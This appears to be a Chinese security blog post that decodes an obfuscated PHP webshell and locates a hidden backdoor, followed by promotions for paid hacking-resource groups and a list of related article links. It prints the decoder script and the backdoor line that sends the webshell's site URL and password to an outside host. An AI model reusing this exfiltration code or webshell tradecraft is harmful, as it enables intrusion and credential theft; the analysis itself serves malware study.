一、PHP大马准备

PHP大马,示例如图所示,已放在 微X 和 XX星球

二、分析过程

第一步: 拿到 PHP 大马之后,查看源码,发现被加密了,而且采用的是 gzinflate+base64 加密

第二步: 既然已经知道了加密方式,接下来就是解密,解密脚本如下

gzinflate+base64-jm.php解密脚本:

<?php $Code = 'XXXXX';//待解密的密文$File = 'jiemi.php';//解码后保存的文件 $Temp = base64_decode($Code); $temp = gzinflate($Temp); $FP = fopen($File,"w"); fwrite($FP,$temp); fclose($FP); echo "解密成功!";
?>

浏览器访问一下 http://127.0.0.1/gzinflate+base64-jm.php 解密文件之后,在同目录下生成解密之后的文件 jiemi.php


查看 jiemi.php 文件,代码内容还很多。

第三步: 查找后门
一般后门都会把当前 webshell(PHP大马) 的密码和 IP 地址一起发送给后门的创造者,那么我们可以先查看当前 PHP大马 传递密码的变量,发现:$password=‘admin’; 变量是 $password。

接下来就可以去已经解密出来的 jiemi.php 文件中搜索该变量
经搜索发现 $password 变量一共在两个位置有,如下图所示。

其中第一处比较可疑。
file_get_contents() :该函数是用于把文件的内容读入到一个字符串中的首选方法。
接下来对该段代码进行解密,解密内容如下:

@file_get_contents(base64_decode('aHR0cDovLzQ1Njc3Nzg5LmNvbS8/aG09').urlencode(base64_decode('aHR0cDovLw==').$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF']."||".$password)."&bz=php");



经过解密之后,拼接该段字符串内容是:http://45677789.com/?hm=http://127.0.0.1/phpdama-1.php||&bz=php(这个就是后门)
后门找到了,也就是说,你废了很大劲拿了一个网站,并且把这个 php大马 传到网站上之后,只要你访问使用这个 PHP大马 就会自动把大马当前所在网站的地址以及密码传给 http://45677789.com这个服务器。

更多资源:
1、web安全工具、渗透测试工具
2、存在漏洞的网站源码与代码审计+漏洞复现教程、
3、渗透测试学习视频、应急响应学习视频、代码审计学习视频、都是2019-2021年期间的较新视频
4、应急响应真实案例复现靶场与应急响应教程
收集整理在知识星球,可加入知识星球进行查看。也可搜索关注微信公众号:W小哥

实战分析PHP大马隐藏后门——案例一相关推荐

  1. 一次真实的应急响应案例(Linux)——SSH暴力破解+crontab隐藏后门——事件复现(含靶场环境)

    一.SSH协议介绍 SSH(Secure Shell)是一套协议标准,可以用来实现两台机器之间的安全登录以及安全的数据传送,其保证数据安全的原理是非对称加密.SSH 是目前较可靠,专为远程登录会话和其 ...

  2. 《实战突击:PHP项目开发案例整合(第2版)(含DVD光盘1张)》

    <实战突击:PHP项目开发案例整合(第2版)(含DVD光盘1张)> 基本信息 作者: 徐康明    辛洪郁 出版社:电子工业出版社 ISBN:9787121221378 上架时间:2014 ...

  3. React.js 小书 Lesson14 - 实战分析:评论功能(一)

    React.js 小书 Lesson14 - 实战分析:评论功能(一) 本文作者:胡子大哈 本文原文:http://react.huziketang.com/blog/lesson14 转载请注明出处 ...

  4. [.NET领域驱动设计实战系列]专题八:DDD案例:网上书店分布式消息队列和分布式缓存的实现...

    原文:[.NET领域驱动设计实战系列]专题八:DDD案例:网上书店分布式消息队列和分布式缓存的实现 一.引言 在上一专题中,商家发货和用户确认收货功能引入了消息队列来实现的,引入消息队列的好处可以保证 ...

  5. aftool刷工具提示15天_【15天】【指数600+】关键词百度首页【实战分析】【面授学员】...

    [15天][指数600+]关键词百度首页[实战分析][面授学员] 案例截图: 面授学员为一名小白,关键词[混凝土增强剂]百度首页真实案例,时间:15天左右(包含从建站到排名),好多兄弟问逆冬,小白能不 ...

  6. 百度关键词分析工具_【轰炸类】关键词百度首页分析【澳门XXX】【实战分析】...

    [轰炸类]关键词百度首页分析[澳门XXX][实战分析] 案例截图: 看到上面的截图,很多朋友都会感觉是入侵某一些网站.然后修改标题,才造成上述截图中结果.其实不然,仔细观察你就会发现,基本都是新闻源类 ...

  7. 【经验科普】实战分析C工程代码可能遇到的编译问题及其解决思路

    文章目录 1 前言 2 回顾 2.1 主要内容 2.2 知识点回顾 3 实战分析 3.1 代码编写阶段 3.2 预编译阶段 3.2.1 No such file or directory (找不到某个 ...

  8. 《实战网络营销 网络推广经典案例战术解》扫描版[PDF]

    电驴资源 下面是用户共享的文件列表,安装电驴后,您可以点击这些文件名进行下载 一┳═┻︻▃内容简介处附有网盘快速下载通道▃︻┻═┳一 [实战网络营销.网络推广经典案例战术解].扫描版.张书乐.pdf详 ...

  9. 精通移动App测试实战:技术、工具和案例

    本文是根据书籍<精通移动App测试实战:技术.工具和案例>进行学习记录,方便后期查阅,感谢书籍作者提供的学习机会. 目录 第1章 Android系统基础内容介绍 1.6创建模拟器 第2章J ...

  10. 【阅读笔记】联邦学习实战——联邦学习医疗健康应用案例

    联邦学习实战--联邦学习医疗健康应用案例 前言 1. 医疗健康数据概述 2. 联邦医疗大数据与脑卒中预测 2.1 联邦数据预处理 2.2 联邦学习脑卒中预测系统 3. 联邦学习在医疗影像中的应用 3. ...

最新文章

  1. createprocess失败代码2_Win7 中 Visual C++ 2015安装失败解决方法
  2. 观点 | 有区块链就一定能创新吗?区块链改变了什么、改变不了什么?
  3. 找不到或无法加载主类 org.jivesoftware.openfire.starter.ServerStarter
  4. 如何把自己的经历写成小说_古天乐的经历教会我们:如何在被欺骗以后改善自己的心理状态...
  5. 例子 类的定义与对象的创建 狗的例子
  6. PyTorch 1.0 中文文档:torch.nn.init
  7. tomcat使用线程池配置高并发连接
  8. 索尼计算机bios正确设置,索尼vaio笔记本如何进入bios设置_索尼笔记本进入bios图解...
  9. 中国叶酒市场趋势报告、技术动态创新及市场预测
  10. NER的过去、现在和未来综述-现在
  11. 牛客 小米校招 计算题 单调栈 接雨水
  12. ES5和ES6的继承有哪些优劣?
  13. 标签打印软件如何设置不规则标签纸
  14. C#调用matlab时的类型初始值设定项引发异常
  15. MyBase - 一个极简的数据库
  16. Ajax+Asp.Net无刷新分页
  17. jQueryHTML5 UI框架Ignite UI 13.2新功能大揭秘(二)
  18. Webug4.0-webshell爆破 ssrf
  19. 利用红外线接收器触发中断信号
  20. 三维荧光平行因子学习记录--(一)DOMfluor工具箱的数据导入

热门文章

  1. 软件项目管理第四课—投标项目需求分析和应答
  2. 波动方程有限差分法matlab,一维波动方程的有限差分法详解.doc
  3. JUnit 4 vs JUnit 5
  4. 过程FMEA:步骤二 结构分析
  5. MySQL8中文手册【持续更新】
  6. python爬虫requests源码链家_python3 爬虫教学之爬取链家二手房(最下面源码) //以更新源码...
  7. 诺基亚 XGS-PON FTTP 系统在科威特完成测试
  8. 小米高通9008授权服务+Miflash(fh_loader.exe)脚本刷机_icloudelectron
  9. mysql下载和安装详细教程
  10. WIFI快连协议层原理